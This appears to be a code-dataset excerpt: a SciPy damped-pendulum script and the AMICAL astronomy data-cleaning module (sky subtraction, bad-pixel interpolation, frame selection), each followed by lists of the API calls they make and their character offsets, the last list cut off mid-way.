from scipy.integrate import odeint # use Runge-Kutta 4
def pend(y, t, b, c): # function definition
"""Gives 2D vector dy/dt as function of y and t, with parameters b and c."""
return np.array([y[1], -b*y[1] - c*np.sin(y[0])])
b, c = 0.25, 5.0 # tuple assignment
y0 = np.array([np.pi - 0.1, 0.0])
t = np.linspace(0, 10, 101) # on [0,10] with 101 points
sol = odeint(pend, y0, t, args=(b, c))
plt.plot(t, sol[:, 0], 'b', label=r'$\theta(t)$') # blue
plt.plot(t, sol[:, 1], 'g', label=r'$\omega(t)$') # green
plt.legend(loc='best')
plt.xlabel('t')
plt.grid()
plt.savefig("figures/Pendulum_solution.png")
plt.show()
|
[
"matplotlib.pyplot.grid",
"matplotlib.pyplot.savefig",
"scipy.integrate.odeint",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.array",
"numpy.linspace",
"numpy.sin",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] |
[((380, 408), 'numpy.array', 'np.array', (['[np.pi - 0.1, 0.0]'], {}), '([np.pi - 0.1, 0.0])\n', (388, 408), True, 'import numpy as np\n'), ((413, 436), 'numpy.linspace', 'np.linspace', (['(0)', '(10)', '(101)'], {}), '(0, 10, 101)\n', (424, 436), True, 'import numpy as np\n'), ((473, 505), 'scipy.integrate.odeint', 'odeint', (['pend', 'y0', 't'], {'args': '(b, c)'}), '(pend, y0, t, args=(b, c))\n', (479, 505), False, 'from scipy.integrate import odeint\n'), ((507, 556), 'matplotlib.pyplot.plot', 'plt.plot', (['t', 'sol[:, 0]', '"""b"""'], {'label': '"""$\\\\theta(t)$"""'}), "(t, sol[:, 0], 'b', label='$\\\\theta(t)$')\n", (515, 556), True, 'import matplotlib.pyplot as plt\n'), ((565, 614), 'matplotlib.pyplot.plot', 'plt.plot', (['t', 'sol[:, 1]', '"""g"""'], {'label': '"""$\\\\omega(t)$"""'}), "(t, sol[:, 1], 'g', label='$\\\\omega(t)$')\n", (573, 614), True, 'import matplotlib.pyplot as plt\n'), ((624, 646), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (634, 646), True, 'import matplotlib.pyplot as plt\n'), ((647, 662), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""t"""'], {}), "('t')\n", (657, 662), True, 'import matplotlib.pyplot as plt\n'), ((663, 673), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (671, 673), True, 'import matplotlib.pyplot as plt\n'), ((674, 718), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""figures/Pendulum_solution.png"""'], {}), "('figures/Pendulum_solution.png')\n", (685, 718), True, 'import matplotlib.pyplot as plt\n'), ((719, 729), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (727, 729), True, 'import matplotlib.pyplot as plt\n'), ((321, 333), 'numpy.sin', 'np.sin', (['y[0]'], {}), '(y[0])\n', (327, 333), True, 'import numpy as np\n')]
|
"""
@author: <NAME> (University of Sydney)
-------------------------------------------------------------------------
AMICAL: Aperture Masking Interferometry Calibration and Analysis Library
-------------------------------------------------------------------------
Function related to data cleaning (ghost, background correction,
centering, etc.) and data selection (sigma-clipping, centered flux,).
--------------------------------------------------------------------
"""
import numpy as np
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from astropy.io import fits
from matplotlib import pyplot as plt
from matplotlib.colors import PowerNorm
from termcolor import cprint
from tqdm import tqdm
from amical.tools import apply_windowing, crop_max
def _apply_patch_ghost(cube, xc, yc, radius=20, dx=0, dy=-200, method='bg'):
"""Apply a patch on an eventual artifacts/ghosts on the spectral filter (i.e.
K1 filter of SPHERE presents an artifact/ghost at (392, 360)).
Arguments:
----------
`cube` {array} -- Data cube,\n
`xc` {int} -- x-axis position of the artifact,\n
`yc` {int} -- y-axis position of the artifact.
Keyword Arguments:
----------
`radius` {int} -- Radius to apply the patch in a circle (default: {10}),\n
`dy` {int} -- Offset pixel number to compute background values (default: {0}),\n
`dx` {int} -- Same along y-axis (default: {0}),\n
`method` {str} -- If 'bg', the replacement values are the background computed at
xc+dx, yx+dy, else zero is apply (default: {'bg'}).
"""
cube_corrected = []
for i in range(len(cube)):
imA = cube[i].copy()
isz = imA.shape[0]
xc_off, yc_off = xc+dx, yc+dy
xx, yy = np.arange(isz), np.arange(isz)
xx_c = (xx-xc)
yy_c = (yc-yy)
xx_off = (xx-xc_off)
yy_off = (yc_off-yy)
distance = np.sqrt(xx_c**2 + yy_c[:, np.newaxis]**2)
distance_off = np.sqrt(xx_off**2 + yy_off[:, np.newaxis]**2)
cond_patch = (distance <= radius)
cond_bg = (distance_off <= radius)
if method == 'bg':
imA[cond_patch] = imA[cond_bg]
elif method == 'zero':
imA[cond_patch] = 0
cube_corrected.append(imA)
cube_corrected = np.array(cube_corrected)
return cube_corrected
def select_data(cube, clip_fact=0.5, clip=False, verbose=True, display=True):
""" Check the cleaned data cube using the position of the maximum in the
fft image (supposed to be zero). If not in zero position, the fram is
rejected. It can apply a sigma-clipping to select only the frames with the
highest total fluxes.
Parameters:
-----------
`cube` {array} -- Data cube,\n
`clip_fact` {float} -- Relative sigma if rejecting frames by
sigma-clipping (default=False),\n
`clip` {bool} -- If True, sigma-clipping is used,\n
`verbose` {bool} -- If True, print informations in the terminal,\n
`display` {bool} -- If True, plot figures.
"""
fft_fram = abs(np.fft.fft2(cube))
# flag_fram, cube_flagged, cube_cleaned_checked = [], [], []
fluxes, flag_fram, good_fram = [], [], []
for i in range(len(fft_fram)):
fluxes.append(fft_fram[i][0, 0])
pos_max = np.argmax(fft_fram[i])
if pos_max != 0:
flag_fram.append(i)
else:
good_fram.append(cube[i])
fluxes = np.array(fluxes)
flag_fram = np.array(flag_fram)
best_fr = np.argmax(fluxes)
worst_fr = np.argmin(fluxes)
std_flux = np.std(fluxes)
med_flux = np.median(fluxes)
if verbose:
if (med_flux/std_flux) <= 5.:
cprint('\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True).' % (
(med_flux/std_flux)), 'cyan')
limit_flux = med_flux - clip_fact*std_flux
if clip:
cond_clip = (fluxes > limit_flux)
cube_cleaned_checked = cube[cond_clip]
ind_clip = np.where(fluxes <= limit_flux)[0]
else:
ind_clip = []
cube_cleaned_checked = np.array(good_fram)
ind_clip2 = np.where(fluxes <= limit_flux)[0]
if ((worst_fr in ind_clip2) and clip) or (worst_fr in flag_fram):
ext = '(rejected)'
else:
ext = ''
diffmm = 100*abs(np.max(fluxes) - np.min(fluxes))/med_flux
if display:
plt.figure()
plt.plot(fluxes, label=r'|$\Delta F$|/$\sigma_F$=%2.0f (%2.2f %%)' %
(med_flux/std_flux, diffmm))
if len(flag_fram) > 0:
plt.scatter(flag_fram, fluxes[flag_fram],
s=52, facecolors='none', edgecolors='r', label='Rejected frames (maximum fluxes)')
if clip:
if len(ind_clip) > 0:
plt.plot(ind_clip, fluxes[ind_clip], 'rx',
label='Rejected frames (clipping)')
else:
print('0')
plt.hlines(limit_flux, 0, len(fluxes), lw=1,
ls='--', label='Clipping limit', zorder=10)
plt.legend(loc='best', fontsize=9)
plt.ylabel('Flux [counts]')
plt.xlabel('# frames')
plt.grid(alpha=.2)
plt.tight_layout()
plt.figure(figsize=(7, 7))
plt.subplot(2, 2, 1)
plt.title('Best fram (%i)' % best_fr)
plt.imshow(cube[best_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
plt.subplot(2, 2, 2)
plt.imshow(np.fft.fftshift(fft_fram[best_fr]), cmap='gist_stern')
plt.subplot(2, 2, 3)
plt.title('Worst fram (%i) %s' % (worst_fr, ext))
plt.imshow(cube[worst_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
plt.subplot(2, 2, 4)
plt.imshow(np.fft.fftshift(fft_fram[worst_fr]), cmap='gist_stern')
plt.tight_layout()
plt.show(block=False)
if verbose:
n_good = len(cube_cleaned_checked)
n_bad = len(cube) - n_good
if clip:
cprint('\n---- σ-clip + centered fluxes selection ---', 'cyan')
else:
cprint('\n---- centered fluxes selection ---', 'cyan')
print('%i/%i (%2.1f%%) are flagged as bad frames' %
(n_bad, len(cube), 100*float(n_bad)/len(cube)))
return cube_cleaned_checked
def sky_correction(imA, r1=100, dr=20, verbose=False):
"""
Perform background sky correction to be as close to zero as possible.
"""
isz = imA.shape[0]
xc, yc = isz//2, isz//2
xx, yy = np.arange(isz), np.arange(isz)
xx2 = (xx-xc)
yy2 = (yc-yy)
r2 = r1 + dr
distance = np.sqrt(xx2**2 + yy2[:, np.newaxis]**2)
cond_bg = (r1 <= distance) & (distance <= r2)
try:
minA = imA.min()
imB = imA + 1.01*abs(minA)
backgroundB = np.mean(imB[cond_bg])
imC = imB - backgroundB
backgroundC = np.mean(imC[cond_bg])
except IndexError:
imC = imA.copy()
backgroundC = 0
if verbose:
cprint('Warning: Background not computed', 'green')
cprint(
'-> check the inner and outer radius rings (checkrad option).', 'green')
return imC, backgroundC
def fix_bad_pixels(image, bad_map, add_bad=[], x_stddev=1):
""" Replace bad pixels with values interpolated from their neighbors (interpolation
is made with a gaussian kernel convolution)."""
if len(add_bad) != 0:
for j in range(len(add_bad)):
bad_map[add_bad[j][0], add_bad[j][1]] = 1
img_nan = image.copy()
img_nan[bad_map == 1] = np.nan
kernel = Gaussian2DKernel(x_stddev=x_stddev)
fixed_image = interpolate_replace_nans(img_nan, kernel)
return fixed_image
def check_data_params(filename, isz, r1, dr, bad_map=None, add_bad=[],
edge=0, remove_bad=True, nframe=0, ihdu=0, f_kernel=3,
offx=0, offy=0, apod=False, window=None):
""" Check the input parameters for the cleaning.
Parameters:
-----------
`filename` {str}: filename containing the datacube,\n
`isz` {int}: Size of the cropped image (default: 256)\n
`r1` {int}: Radius of the rings to compute background sky (default: 100)\n
`dr` {int}: Outer radius to compute sky (default: 10)\n
`bad_map` {array}: Bad pixel map with 0 and 1 where 1 set for a bad pixel (default: None),\n
`add_bad` {list}: List of 2d coordinates of bad pixels/cosmic rays (default: []),\n
`edge` {int}: Number of pixel to be removed on the edge of the image (SPHERE),\n
`remove_bad` {bool}: If True, the bad pixels are removed using a gaussian interpolation,\n
`nframe` {int}: Frame number to be shown (default: 0),\n
`ihdu` {int}: Hdu number of the fits file. Normally 1 for NIRISS and 0 for SPHERE (default: 0).
"""
data = fits.open(filename)[ihdu].data
img0 = data[nframe]
if edge != 0:
img0[:, 0:edge] = 0
img0[:, -edge:-1] = 0
img0[0:edge, :] = 0
img0[-edge:-1, :] = 0
if (bad_map is not None) & (remove_bad):
img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
else:
img1 = img0.copy()
cropped_infos = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)
pos = cropped_infos[1]
noBadPixel = False
bad_pix_x, bad_pix_y = [], []
if (bad_map is not None) or (len(add_bad) != 0):
for j in range(len(add_bad)):
bad_map[add_bad[j][0], add_bad[j][1]] = 1
bad_pix = np.where(bad_map == 1)
bad_pix_x = bad_pix[0]
bad_pix_y = bad_pix[1]
else:
noBadPixel = True
r2 = r1 + dr
theta = np.linspace(0, 2*np.pi, 100)
x0 = pos[0]
y0 = pos[1]
x1 = r1 * np.cos(theta) + x0
y1 = r1 * np.sin(theta) + y0
x2 = r2 * np.cos(theta) + x0
y2 = r2 * np.sin(theta) + y0
if window is not None:
r3 = window
x3 = r3 * np.cos(theta) + x0
y3 = r3 * np.sin(theta) + y0
xs1, ys1 = x0 + isz//2, y0 + isz//2
xs2, ys2 = x0 - isz//2, y0 + isz//2
xs3, ys3 = x0 - isz//2, y0 - isz//2
xs4, ys4 = x0 + isz//2, y0 - isz//2
max_val = img1[y0, x0]
fig = plt.figure(figsize=(6, 6))
plt.imshow(img1, norm=PowerNorm(.5), cmap='afmhot', vmin=0, vmax=max_val)
plt.plot(x1, y1, label='Inner radius for sky subtraction')
plt.plot(x2, y2, label='Outer radius for sky subtraction')
if apod:
if window is not None:
plt.plot(x3, y3, label='Super-gaussian windowing')
plt.plot(x0, y0, '+', color='g', ms=10, label='Centering position')
plt.plot([xs1, xs2, xs3, xs4, xs1], [ys1, ys2, ys3, ys4, ys1], 'w--',
label='Resized image')
if not noBadPixel:
if remove_bad:
label = 'Fixed hot/bad pixels'
else:
label = 'Hot/bad pixels'
plt.scatter(bad_pix_y, bad_pix_x, color='', marker='s',
edgecolors='r', s=20, label=label)
plt.legend(fontsize=7, loc=1)
plt.tight_layout()
return fig
def clean_data(data, isz=None, r1=None, dr=None, edge=0,
r2=None, bad_map=None, add_bad=[], apod=True,
offx=0, offy=0, sky=True, window=None,
f_kernel=3, verbose=False):
""" Clean data.
Parameters:
-----------
`data` {np.array} -- datacube containing the NRM data\n
`isz` {int} -- Size of the cropped image (default: {None})\n
`r1` {int} -- Radius of the rings to compute background sky (default: {None})\n
`dr` {int} -- Outer radius to compute sky (default: {None})\n
`edge` {int} -- Patch the edges of the image (VLT/SPHERE artifact, default: {200}),\n
`checkrad` {bool} -- If True, check the resizing and sky substraction parameters (default: {False})\n
Returns:
--------
`cube` {np.array} -- Cleaned datacube.
"""
# print(data.shape[1])
# if data.shape[1] % 2 == 1:
# data = np.array([im[:-1, :-1] for im in data])
n_im = data.shape[0]
cube_cleaned = np.zeros([n_im, isz, isz])
for i in tqdm(range(n_im), ncols=100, desc='Cleaning', leave=False):
img0 = data[i]
if edge != 0:
img0[:, 0:edge] = 0
img0[:, -edge:-1] = 0
img0[0:edge, :] = 0
img0[-edge:-1, :] = 0
if bad_map is not None:
img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
else:
img1 = img0.copy()
im_rec_max = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)[0]
if sky:
img_biased = sky_correction(im_rec_max, r1=r1, dr=dr,
verbose=verbose)[0]
else:
img_biased = im_rec_max.copy()
img_biased[img_biased < 0] = 0 # Remove negative pixels
if img_biased.shape[0] != img_biased.shape[1]:
cprint(
'\nCropped image do not have same X, Y dimensions -> check isz', 'red')
return None
if apod:
if r2 is None:
r2 = isz//3
img = apply_windowing(img_biased, window=window)
else:
img = img_biased.copy()
cube_cleaned[i] = img
return cube_cleaned
def select_clean_data(filename, isz=256, r1=100, r2=None, dr=10, edge=0,
clip=True, bad_map=None, add_bad=[], offx=0, offy=0,
clip_fact=0.5, apod=True, sky=True, window=None,
f_kernel=3, verbose=False, ihdu=0, display=False):
""" Clean and select good datacube (sigma-clipping using fluxes variations).
Parameters:
-----------
`filename` {str}: filename containing the datacube,\n
`isz` {int}: Size of the cropped image (default: 256)\n
`r1` {int}: Radius of the rings to compute background sky (default: 100)\n
`dr` {int}: Outer radius to compute sky (default: 10)\n
`edge` {int}: Patch the edges of the image (VLT/SPHERE artifact, default: {100}),\n
`clip` {bool}: If True, sigma-clipping is used to reject frames with low integrated flux,\n
`clip_fact` {float}: Relative sigma if rejecting frames by sigma-clipping
(default=0.5),\n
Returns:
--------
`cube_final` {np.array}: Cleaned and selected datacube.
"""
hdu = fits.open(filename)
cube = hdu[ihdu].data
hdr = hdu[0].header
if hdr['INSTRUME'] == 'SPHERE':
seeing_start = float(hdr['HIERARCH ESO TEL AMBI FWHM START'])
seeing = float(hdr['HIERARCH ESO TEL IA FWHM'])
seeing_end = float(hdr['HIERARCH ESO TEL AMBI FWHM END'])
if verbose:
print('\n----- Seeing conditions -----')
print("%2.2f (start), %2.2f (end), %2.2f (Corrected AirMass)" %
(seeing_start, seeing_end, seeing))
raw_size = cube.shape[1]
if isz > raw_size:
raise ValueError(
'Reshape factor is larger than the data size (choose a smaller isz).')
cube_cleaned = clean_data(cube, isz=isz, r1=r1, edge=edge,
r2=r2, bad_map=bad_map, add_bad=add_bad,
dr=dr, sky=sky, apod=apod, window=window,
f_kernel=f_kernel, offx=offx, offy=offy,
verbose=verbose)
if cube_cleaned is None:
return None
cube_final = select_data(cube_cleaned, clip=clip, clip_fact=clip_fact,
verbose=verbose, display=display)
return cube_final
|
[
"matplotlib.pyplot.grid",
"numpy.sqrt",
"matplotlib.pyplot.ylabel",
"numpy.array",
"astropy.io.fits.open",
"numpy.sin",
"numpy.arange",
"numpy.mean",
"numpy.where",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"amical.tools.apply_windowing",
"numpy.fft.fft2",
"numpy.max",
"numpy.linspace",
"matplotlib.pyplot.scatter",
"numpy.min",
"numpy.argmin",
"termcolor.cprint",
"numpy.argmax",
"matplotlib.colors.PowerNorm",
"astropy.convolution.interpolate_replace_nans",
"numpy.cos",
"numpy.std",
"matplotlib.pyplot.title",
"matplotlib.pyplot.legend",
"amical.tools.crop_max",
"matplotlib.pyplot.show",
"numpy.median",
"matplotlib.pyplot.figure",
"numpy.zeros",
"matplotlib.pyplot.tight_layout",
"astropy.convolution.Gaussian2DKernel",
"numpy.fft.fftshift",
"matplotlib.pyplot.subplot"
] |
[((2288, 2312), 'numpy.array', 'np.array', (['cube_corrected'], {}), '(cube_corrected)\n', (2296, 2312), True, 'import numpy as np\n'), ((3422, 3438), 'numpy.array', 'np.array', (['fluxes'], {}), '(fluxes)\n', (3430, 3438), True, 'import numpy as np\n'), ((3455, 3474), 'numpy.array', 'np.array', (['flag_fram'], {}), '(flag_fram)\n', (3463, 3474), True, 'import numpy as np\n'), ((3490, 3507), 'numpy.argmax', 'np.argmax', (['fluxes'], {}), '(fluxes)\n', (3499, 3507), True, 'import numpy as np\n'), ((3523, 3540), 'numpy.argmin', 'np.argmin', (['fluxes'], {}), '(fluxes)\n', (3532, 3540), True, 'import numpy as np\n'), ((3557, 3571), 'numpy.std', 'np.std', (['fluxes'], {}), '(fluxes)\n', (3563, 3571), True, 'import numpy as np\n'), ((3587, 3604), 'numpy.median', 'np.median', (['fluxes'], {}), '(fluxes)\n', (3596, 3604), True, 'import numpy as np\n'), ((6549, 6592), 'numpy.sqrt', 'np.sqrt', (['(xx2 ** 2 + yy2[:, np.newaxis] ** 2)'], {}), '(xx2 ** 2 + yy2[:, np.newaxis] ** 2)\n', (6556, 6592), True, 'import numpy as np\n'), ((7518, 7553), 'astropy.convolution.Gaussian2DKernel', 'Gaussian2DKernel', ([], {'x_stddev': 'x_stddev'}), '(x_stddev=x_stddev)\n', (7534, 7553), False, 'from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans\n'), ((7572, 7613), 'astropy.convolution.interpolate_replace_nans', 'interpolate_replace_nans', (['img_nan', 'kernel'], {}), '(img_nan, kernel)\n', (7596, 7613), False, 'from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans\n'), ((9093, 9146), 'amical.tools.crop_max', 'crop_max', (['img1', 'isz'], {'offx': 'offx', 'offy': 'offy', 'f': 'f_kernel'}), '(img1, isz, offx=offx, offy=offy, f=f_kernel)\n', (9101, 9146), False, 'from amical.tools import apply_windowing, crop_max\n'), ((9546, 9576), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (9557, 9576), True, 'import numpy as np\n'), ((10060, 10086), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 6)'}), '(figsize=(6, 6))\n', (10070, 10086), True, 'from matplotlib import pyplot as plt\n'), ((10169, 10227), 'matplotlib.pyplot.plot', 'plt.plot', (['x1', 'y1'], {'label': '"""Inner radius for sky subtraction"""'}), "(x1, y1, label='Inner radius for sky subtraction')\n", (10177, 10227), True, 'from matplotlib import pyplot as plt\n'), ((10232, 10290), 'matplotlib.pyplot.plot', 'plt.plot', (['x2', 'y2'], {'label': '"""Outer radius for sky subtraction"""'}), "(x2, y2, label='Outer radius for sky subtraction')\n", (10240, 10290), True, 'from matplotlib import pyplot as plt\n'), ((10402, 10469), 'matplotlib.pyplot.plot', 'plt.plot', (['x0', 'y0', '"""+"""'], {'color': '"""g"""', 'ms': '(10)', 'label': '"""Centering position"""'}), "(x0, y0, '+', color='g', ms=10, label='Centering position')\n", (10410, 10469), True, 'from matplotlib import pyplot as plt\n'), ((10474, 10571), 'matplotlib.pyplot.plot', 'plt.plot', (['[xs1, xs2, xs3, xs4, xs1]', '[ys1, ys2, ys3, ys4, ys1]', '"""w--"""'], {'label': '"""Resized image"""'}), "([xs1, xs2, xs3, xs4, xs1], [ys1, ys2, ys3, ys4, ys1], 'w--', label\n ='Resized image')\n", (10482, 10571), True, 'from matplotlib import pyplot as plt\n'), ((10844, 10873), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'fontsize': '(7)', 'loc': '(1)'}), '(fontsize=7, loc=1)\n', (10854, 10873), True, 'from matplotlib import pyplot as plt\n'), ((10878, 10896), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (10894, 10896), True, 'from matplotlib import pyplot as plt\n'), ((11894, 11920), 'numpy.zeros', 'np.zeros', (['[n_im, isz, isz]'], {}), '([n_im, isz, isz])\n', (11902, 11920), True, 'import numpy as np\n'), ((14138, 14157), 'astropy.io.fits.open', 'fits.open', (['filename'], {}), '(filename)\n', (14147, 14157), False, 'from astropy.io import fits\n'), ((1903, 1948), 'numpy.sqrt', 'np.sqrt', (['(xx_c ** 2 + yy_c[:, np.newaxis] ** 2)'], {}), '(xx_c ** 2 + yy_c[:, np.newaxis] ** 2)\n', (1910, 1948), True, 'import numpy as np\n'), ((1968, 2017), 'numpy.sqrt', 'np.sqrt', (['(xx_off ** 2 + yy_off[:, np.newaxis] ** 2)'], {}), '(xx_off ** 2 + yy_off[:, np.newaxis] ** 2)\n', (1975, 2017), True, 'import numpy as np\n'), ((3051, 3068), 'numpy.fft.fft2', 'np.fft.fft2', (['cube'], {}), '(cube)\n', (3062, 3068), True, 'import numpy as np\n'), ((3276, 3298), 'numpy.argmax', 'np.argmax', (['fft_fram[i]'], {}), '(fft_fram[i])\n', (3285, 3298), True, 'import numpy as np\n'), ((4092, 4111), 'numpy.array', 'np.array', (['good_fram'], {}), '(good_fram)\n', (4100, 4111), True, 'import numpy as np\n'), ((4129, 4159), 'numpy.where', 'np.where', (['(fluxes <= limit_flux)'], {}), '(fluxes <= limit_flux)\n', (4137, 4159), True, 'import numpy as np\n'), ((4375, 4387), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4385, 4387), True, 'from matplotlib import pyplot as plt\n'), ((4396, 4501), 'matplotlib.pyplot.plot', 'plt.plot', (['fluxes'], {'label': "('|$\\\\Delta F$|/$\\\\sigma_F$=%2.0f (%2.2f %%)' % (med_flux / std_flux, diffmm))"}), "(fluxes, label='|$\\\\Delta F$|/$\\\\sigma_F$=%2.0f (%2.2f %%)' % (\n med_flux / std_flux, diffmm))\n", (4404, 4501), True, 'from matplotlib import pyplot as plt\n'), ((5043, 5077), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""', 'fontsize': '(9)'}), "(loc='best', fontsize=9)\n", (5053, 5077), True, 'from matplotlib import pyplot as plt\n'), ((5086, 5113), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Flux [counts]"""'], {}), "('Flux [counts]')\n", (5096, 5113), True, 'from matplotlib import pyplot as plt\n'), ((5122, 5144), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""# frames"""'], {}), "('# frames')\n", (5132, 5144), True, 'from matplotlib import pyplot as plt\n'), ((5153, 5172), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'alpha': '(0.2)'}), '(alpha=0.2)\n', (5161, 5172), True, 'from matplotlib import pyplot as plt\n'), ((5180, 5198), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5196, 5198), True, 'from matplotlib import pyplot as plt\n'), ((5208, 5234), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7, 7)'}), '(figsize=(7, 7))\n', (5218, 5234), True, 'from matplotlib import pyplot as plt\n'), ((5243, 5263), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(1)'], {}), '(2, 2, 1)\n', (5254, 5263), True, 'from matplotlib import pyplot as plt\n'), ((5272, 5309), 'matplotlib.pyplot.title', 'plt.title', (["('Best fram (%i)' % best_fr)"], {}), "('Best fram (%i)' % best_fr)\n", (5281, 5309), True, 'from matplotlib import pyplot as plt\n'), ((5395, 5415), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (5406, 5415), True, 'from matplotlib import pyplot as plt\n'), ((5498, 5518), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (5509, 5518), True, 'from matplotlib import pyplot as plt\n'), ((5527, 5576), 'matplotlib.pyplot.title', 'plt.title', (["('Worst fram (%i) %s' % (worst_fr, ext))"], {}), "('Worst fram (%i) %s' % (worst_fr, ext))\n", (5536, 5576), True, 'from matplotlib import pyplot as plt\n'), ((5663, 5683), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(4)'], {}), '(2, 2, 4)\n', (5674, 5683), True, 'from matplotlib import pyplot as plt\n'), ((5767, 5785), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5783, 5785), True, 'from matplotlib import pyplot as plt\n'), ((5794, 5815), 'matplotlib.pyplot.show', 'plt.show', ([], {'block': '(False)'}), '(block=False)\n', (5802, 5815), True, 'from matplotlib import pyplot as plt\n'), ((6449, 6463), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (6458, 6463), True, 'import numpy as np\n'), ((6465, 6479), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (6474, 6479), True, 'import numpy as np\n'), ((6731, 6752), 'numpy.mean', 'np.mean', (['imB[cond_bg]'], {}), '(imB[cond_bg])\n', (6738, 6752), True, 'import numpy as np\n'), ((6807, 6828), 'numpy.mean', 'np.mean', (['imC[cond_bg]'], {}), '(imC[cond_bg])\n', (6814, 6828), True, 'import numpy as np\n'), ((9395, 9417), 'numpy.where', 'np.where', (['(bad_map == 1)'], {}), '(bad_map == 1)\n', (9403, 9417), True, 'import numpy as np\n'), ((10728, 10823), 'matplotlib.pyplot.scatter', 'plt.scatter', (['bad_pix_y', 'bad_pix_x'], {'color': '""""""', 'marker': '"""s"""', 'edgecolors': '"""r"""', 's': '(20)', 'label': 'label'}), "(bad_pix_y, bad_pix_x, color='', marker='s', edgecolors='r', s=\n 20, label=label)\n", (10739, 10823), True, 'from matplotlib import pyplot as plt\n'), ((1749, 1763), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (1758, 1763), True, 'import numpy as np\n'), ((1765, 1779), 'numpy.arange', 'np.arange', (['isz'], {}), '(isz)\n', (1774, 1779), True, 'import numpy as np\n'), ((3672, 3819), 'termcolor.cprint', 'cprint', (['("""\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True)."""\n % (med_flux / std_flux))', '"""cyan"""'], {}), '(\n """\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True)."""\n % (med_flux / std_flux), \'cyan\')\n', (3678, 3819), False, 'from termcolor import cprint\n'), ((3995, 4025), 'numpy.where', 'np.where', (['(fluxes <= limit_flux)'], {}), '(fluxes <= limit_flux)\n', (4003, 4025), True, 'import numpy as np\n'), ((4554, 4682), 'matplotlib.pyplot.scatter', 'plt.scatter', (['flag_fram', 'fluxes[flag_fram]'], {'s': '(52)', 'facecolors': '"""none"""', 'edgecolors': '"""r"""', 'label': '"""Rejected frames (maximum fluxes)"""'}), "(flag_fram, fluxes[flag_fram], s=52, facecolors='none',\n edgecolors='r', label='Rejected frames (maximum fluxes)')\n", (4565, 4682), True, 'from matplotlib import pyplot as plt\n'), ((5435, 5469), 'numpy.fft.fftshift', 'np.fft.fftshift', (['fft_fram[best_fr]'], {}), '(fft_fram[best_fr])\n', (5450, 5469), True, 'import numpy as np\n'), ((5703, 5738), 'numpy.fft.fftshift', 'np.fft.fftshift', (['fft_fram[worst_fr]'], {}), '(fft_fram[worst_fr])\n', (5718, 5738), True, 'import numpy as np\n'), ((5939, 6005), 'termcolor.cprint', 'cprint', (['"""\n---- σ-clip + centered fluxes selection ---"""', '"""cyan"""'], {}), '("""\n---- σ-clip + centered fluxes selection ---""", \'cyan\')\n', (5945, 6005), False, 'from termcolor import cprint\n'), ((6029, 6086), 'termcolor.cprint', 'cprint', (['"""\n---- centered fluxes selection ---"""', '"""cyan"""'], {}), '("""\n---- centered fluxes selection ---""", \'cyan\')\n', (6035, 6086), False, 'from termcolor import cprint\n'), ((8740, 8759), 'astropy.io.fits.open', 'fits.open', (['filename'], {}), '(filename)\n', (8749, 8759), False, 'from astropy.io import fits\n'), ((9622, 9635), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (9628, 9635), True, 'import numpy as np\n'), ((9655, 9668), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (9661, 9668), True, 'import numpy as np\n'), ((9688, 9701), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (9694, 9701), True, 'import numpy as np\n'), ((9721, 9734), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (9727, 9734), True, 'import numpy as np\n'), ((10113, 10127), 'matplotlib.colors.PowerNorm', 'PowerNorm', (['(0.5)'], {}), '(0.5)\n', (10122, 10127), False, 'from matplotlib.colors import PowerNorm\n'), ((10347, 10397), 'matplotlib.pyplot.plot', 'plt.plot', (['x3', 'y3'], {'label': '"""Super-gaussian windowing"""'}), "(x3, y3, label='Super-gaussian windowing')\n", (10355, 10397), True, 'from matplotlib import pyplot as plt\n'), ((12335, 12388), 'amical.tools.crop_max', 'crop_max', (['img1', 'isz'], {'offx': 'offx', 'offy': 'offy', 'f': 'f_kernel'}), '(img1, isz, 